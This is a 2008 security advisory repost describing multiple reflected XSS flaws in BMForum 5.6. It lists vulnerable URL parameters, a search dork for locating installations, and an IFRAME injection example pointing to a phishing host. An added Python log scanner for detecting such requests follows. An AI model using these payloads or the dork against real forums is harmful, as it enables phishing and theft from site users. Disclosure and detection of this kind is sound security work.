Securityvulns: SECURITYVULNS:DOC:19887
May 22, 2008 - 12:00 a.m.

BMForum Remote 5.6 Multiple XSS Vulnerability


==========================================================
BMForum Remote 5.6 Multiple XSS Vulnerability

AUTHOR : CWH Underground
DATE : 22 May 2008
SITE : www.citec.us

#####################################################
APPLICATION : BMForum
VERSION : 5.6 (Latest Version)
VENDOR : http://downloads.sourceforge.net/bmforum
#####################################################

DORK: "powered by BMForum"

--- Exploit ---

[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>

--- Note ---
Very dangerous: the 'IFRAME' tag can be used for phishing techniques.

Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">

##################################################################

Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C

##################################################################
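
Added example, not part of the original advisory: a defender-side check that flags access-log requests to the scripts and parameters listed above when the decoded value contains angle brackets, including double-encoded ones. The combined access-log format, the `/forum/` install path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path suffixes and parameter names taken from the advisory's list.
AFFECTED = {
    "/index.php": {"outpused"},
    "/newtem/footer/bsd01footer.php": {"footer_copyright", "verandproname"},
    "/newtem/header/bsd01header.php": {"topads", "myplugin"},
}
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines; documentation addresses and hosts only
    '192.0.2.10 - - [22/May/2008:10:00:01 +0000] "GET /forum/index.php?outpused=%3CIFRAME%20src%3Dhttp%3A%2F%2Fexample.invalid%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [22/May/2008:10:00:05 +0000] "GET /forum/newtem/header/bsd01header.php?topads=%253Cb%253E HTTP/1.1" 200 812',
    '192.0.2.12 - - [22/May/2008:10:00:09 +0000] "GET /forum/index.php?forumid=3 HTTP/1.1" 200 9001',
]


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so that %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return sorted (script suffix, parameter) hits for one log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    hits = set()
    for suffix, params in AFFECTED.items():
        if not url.path.lower().endswith(suffix):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in params and re.search(r"[<>]", fully_decode(value)):
                hits.add((suffix, name))
    return sorted(hits)


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line))
```

A hit only shows that markup was sent to one of the listed parameters; whether it was reflected depends on the installed version and any output filtering in front of the forum.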